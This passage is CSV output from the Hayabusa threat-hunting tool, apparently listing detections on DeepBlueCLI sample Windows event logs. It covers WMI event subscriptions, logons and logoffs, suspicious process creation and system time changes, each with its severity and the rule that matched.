Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:28.619 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:10:53.299 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: 
IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:55:35.625 
+09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: 
IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : 
Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 